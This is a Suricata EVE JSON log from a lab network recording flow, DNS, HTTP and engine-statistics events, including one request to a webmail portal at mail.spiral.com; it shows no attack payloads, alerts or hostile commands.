{"timestamp":"2020-02-29T00:23:38.001819+0000","flow_id":1506488481224280,"event_type":"flow","src_ip":"192.168.10.81","src_port":52962,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":784,"bytes_toclient":910,"start":"2020-02-29T00:22:32.464472+0000","end":"2020-02-29T00:22:37.471831+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:23:38.001870+0000","flow_id":381567826925203,"event_type":"flow","src_ip":"192.168.10.81","src_port":52964,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":6,"bytes_toserver":1360,"bytes_toclient":1913,"start":"2020-02-29T00:22:32.464531+0000","end":"2020-02-29T00:22:37.472507+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:39.000252+0000","flow_id":12900719167830,"event_type":"flow","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":27,"pkts_toclient":37,"bytes_toserver":4664,"bytes_toclient":43270,"start":"2020-02-29T00:22:32.362838+0000","end":"2020-02-29T00:22:38.037589+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:39.000471+0000","flow_id":730770142977525,"event_type":"flow","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":53,"pkts_toclient":73,"bytes_toserver":6982,"bytes_toclient":92760,"start":"2020-02-29T00:22:32.318965+0000","end":"2020-02-29T00:22:38.042472+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:23:44.000688+0000","flow_id":110173123482339,"event_type":"flow","src_ip":"192.168.10.122","src_port":49631,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:18:43.889571+0000","end":"2020-02-29T00:18:43.998032+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:45.000149+0000","event_type":"stats","stats":{"uptime":15077,"capture":{"kernel_packets":140147,"kernel_drops":0},"decoder":{"pkts":140149,"bytes":96197471,"invalid":195,"ipv4":138576,"ipv6":10,"ethernet":140149,"raw":0,"null":0,"sll":0,"tcp":133024,"udp":5342,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093312},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2880,"ssn_memcap_drop":0,"pseudo":351,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2896,"synack":2887,"rst":1214,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1897,"ftp":0,"smtp":0,"tls":777,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2444,"failed_udp":116},"tx":{"http":4910,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2526}},"flow_mgr":{"closed_pruned":2861,"new_pruned":17,"est_pruned":2507,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":2,"flows_removed":0,"rows_checked
":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":16855,"memcap_state":0,"memcap_global":0},"http":{"memuse":480,"memcap":0}}} {"timestamp":"2020-02-29T00:23:47.000853+0000","flow_id":1826094178214393,"event_type":"flow","src_ip":"192.168.10.81","src_port":52968,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1070,"bytes_toclient":732,"start":"2020-02-29T00:22:41.369145+0000","end":"2020-02-29T00:22:46.542040+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:52.000303+0000","event_type":"stats","stats":{"uptime":15084,"capture":{"kernel_packets":140243,"kernel_drops":0},"decoder":{"pkts":140247,"bytes":96281893,"invalid":195,"ipv4":138672,"ipv6":10,"ethernet":140247,"raw":0,"null":0,"sll":0,"tcp":133120,"udp":5342,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093024},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2881,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2897,"synack":2888,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1897,"ftp":0,"smtp":0,"tls":778,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"d
ns_udp":2444,"failed_udp":116},"tx":{"http":4910,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2526}},"flow_mgr":{"closed_pruned":2862,"new_pruned":17,"est_pruned":2508,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":2,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":16855,"memcap_state":0,"memcap_global":0},"http":{"memuse":400,"memcap":0}}} {"timestamp":"2020-02-29T00:23:52.000998+0000","flow_id":1992764664025219,"event_type":"flow","src_ip":"192.168.10.122","src_port":52667,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:51.102531+0000","end":"2020-02-29T00:18:51.207491+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:53.234003+0000","flow_id":1432799732666899,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36710,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":3775,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:23:53.345755+0000","flow_id":1432799732666899,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36710,"proto":"UDP","dns":{"type":"answer","id":3775,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:23:53.345755+0000","flow_id":1432799732666899,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36710,"proto":"UDP","dns":{"type":"answer","id":3775,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:23:53.491588+0000","flow_id":1124622944265220,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52982,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8090}} {"timestamp":"2020-02-29T00:23:57.000378+0000","flow_id":171140185030946,"event_type":"flow","src_ip":"192.168.10.122","src_port":35507,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:55.950562+0000","end":"2020-02-29T00:18:56.058921+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:58.492418+0000","flow_id":1124622944265220,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52982,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8090},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":47021,"tx_id":0}} 
{"timestamp":"2020-02-29T00:23:59.000189+0000","event_type":"stats","stats":{"uptime":15091,"capture":{"kernel_packets":140249,"kernel_drops":0},"decoder":{"pkts":140266,"bytes":96292218,"invalid":195,"ipv4":138691,"ipv6":10,"ethernet":140266,"raw":0,"null":0,"sll":0,"tcp":133137,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093024},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2882,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2898,"synack":2889,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":778,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2862,"new_pruned":17,"est_pruned":2509,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":1,"flows_timeout":2,"flows_timeout_inuse":2,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":16523,"memcap_state":0,"memcap_global":0},"http":{"memuse":480,"memcap":0}}} 
{"timestamp":"2020-02-29T00:24:01.000154+0000","flow_id":1273696944968040,"event_type":"flow","src_ip":"192.168.10.122","src_port":38608,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:00.250216+0000","end":"2020-02-29T00:19:00.358727+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:04.000676+0000","flow_id":97064884588838,"event_type":"flow","src_ip":"192.168.10.122","src_port":42079,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:03.020774+0000","end":"2020-02-29T00:19:03.129636+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:06.000224+0000","event_type":"stats","stats":{"uptime":15098,"capture":{"kernel_packets":140267,"kernel_drops":0},"decoder":{"pkts":140273,"bytes":96292584,"invalid":195,"ipv4":138694,"ipv6":10,"ethernet":140273,"raw":0,"null":0,"sll":0,"tcp":133140,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092448},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2882,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2898,"synack":2889,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app
_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":778,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2862,"new_pruned":17,"est_pruned":2512,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":0,"flows_timeout":3,"flows_timeout_inuse":2,"flows_removed":1,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":15861,"memcap_state":0,"memcap_global":0},"http":{"memuse":480,"memcap":0}}} {"timestamp":"2020-02-29T00:24:06.002115+0000","flow_id":181357912881723,"event_type":"flow","src_ip":"192.168.10.122","src_port":38040,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:05.227899+0000","end":"2020-02-29T00:19:05.336483+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:08.000606+0000","flow_id":767745518388486,"event_type":"flow","src_ip":"192.168.10.81","src_port":52970,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":5,"pkts_toclient":4,"bytes_toserver":338,"bytes_toclient":921,"start":"2020-02-29T00:23:02.050438+0000","end":"2020-02-29T00:23:07.279817+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"13","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:24:08.000821+0000","flow_id":769897281519196,"event_type":"flow","src_ip":"192.168.10.122","src_port":56980,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:06.949852+0000","end":"2020-02-29T00:19:07.058440+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:12.000443+0000","flow_id":2024272545427820,"event_type":"flow","src_ip":"192.168.10.122","src_port":58238,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:11.635244+0000","end":"2020-02-29T00:19:11.743356+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:12.000847+0000","flow_id":1783625527824888,"event_type":"flow","src_ip":"192.168.10.122","src_port":51082,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:11.823800+0000","end":"2020-02-29T00:19:11.928718+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:24:13.000168+0000","event_type":"stats","stats":{"uptime":15105,"capture":{"kernel_packets":140267,"kernel_drops":0},"decoder":{"pkts":140273,"bytes":96292584,"invalid":195,"ipv4":138694,"ipv6":10,"ethernet":140273,"raw":0,"null":0,"sll":0,"tcp":133140,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091584},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2882,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2898,"synack":2889,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":778,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2863,"new_pruned":17,"est_pruned":2514,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":2,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":14537,"memcap_state":0,"memcap_global":0},"http":{"memuse":480,"memcap":0}}} 
{"timestamp":"2020-02-29T00:24:18.000843+0000","flow_id":1934138362150047,"event_type":"flow","src_ip":"192.168.10.122","src_port":46219,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:17.310431+0000","end":"2020-02-29T00:19:17.418887+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:18.001101+0000","flow_id":836147152779304,"event_type":"flow","src_ip":"192.168.10.122","src_port":35956,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:17.489512+0000","end":"2020-02-29T00:19:17.594290+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:19.002380+0000","flow_id":1779901807041841,"event_type":"flow","src_ip":"192.168.10.81","src_port":52976,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":7,"bytes_toserver":913,"bytes_toclient":3914,"start":"2020-02-29T00:23:13.564529+0000","end":"2020-02-29T00:23:18.577333+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:24:20.000579+0000","event_type":"stats","stats":{"uptime":15112,"capture":{"kernel_packets":140267,"kernel_drops":0},"decoder":{"pkts":140273,"bytes":96292584,"invalid":195,"ipv4":138694,"ipv6":10,"ethernet":140273,"raw":0,"null":0,"sll":0,"tcp":133140,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7090432},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2882,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2898,"synack":2889,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":778,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2863,"new_pruned":17,"est_pruned":2518,"bypassed_pruned":0,"flows_checked":6,"flows_notimeout":1,"flows_timeout":5,"flows_timeout_inuse":3,"flows_removed":2,"rows_checked":65536,"rows_skipped":65530,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":13875,"memcap_state":0,"memcap_global":0},"http":{"memuse":400,"memcap":0}}} 
{"timestamp":"2020-02-29T00:24:21.000189+0000","flow_id":1553466836230670,"event_type":"flow","src_ip":"192.168.10.81","src_port":52978,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":16,"pkts_toclient":16,"bytes_toserver":3253,"bytes_toclient":13426,"start":"2020-02-29T00:23:13.565774+0000","end":"2020-02-29T00:23:19.064430+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:21.000541+0000","flow_id":1327585916188998,"event_type":"flow","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":30,"pkts_toclient":38,"bytes_toserver":7697,"bytes_toclient":42976,"start":"2020-02-29T00:23:13.555334+0000","end":"2020-02-29T00:23:19.063679+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:21.000749+0000","flow_id":1632747637355106,"event_type":"flow","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":52,"pkts_toclient":69,"bytes_toserver":11289,"bytes_toclient":73773,"start":"2020-02-29T00:23:10.307810+0000","end":"2020-02-29T00:23:19.067296+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:24:23.000496+0000","flow_id":2025049950055944,"event_type":"flow","src_ip":"192.168.10.130","src_port":34276,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":36,"pkts_toclient":64,"bytes_toserver":3765,"bytes_toclient":80837,"start":"2020-02-29T00:23:08.323080+0000","end":"2020-02-29T00:23:13.392667+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:26.000704+0000","flow_id":96399181527716,"event_type":"flow","src_ip":"192.168.10.81","src_port":52980,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1299,"bytes_toclient":1110,"start":"2020-02-29T00:23:20.440996+0000","end":"2020-02-29T00:23:25.669829+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:24:27.000194+0000","event_type":"stats","stats":{"uptime":15119,"capture":{"kernel_packets":140276,"kernel_drops":0},"decoder":{"pkts":140360,"bytes":96376290,"invalid":195,"ipv4":138781,"ipv6":10,"ethernet":140360,"raw":0,"null":0,"sll":0,"tcp":133227,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7089280},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2883,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2899,"synack":2890,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":779,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2868,"new_pruned":17,"est_pruned":2518,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":2,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":13875,"memcap_state":0,"memcap_global":0},"http":{"memuse":80,"memcap":0}}} 
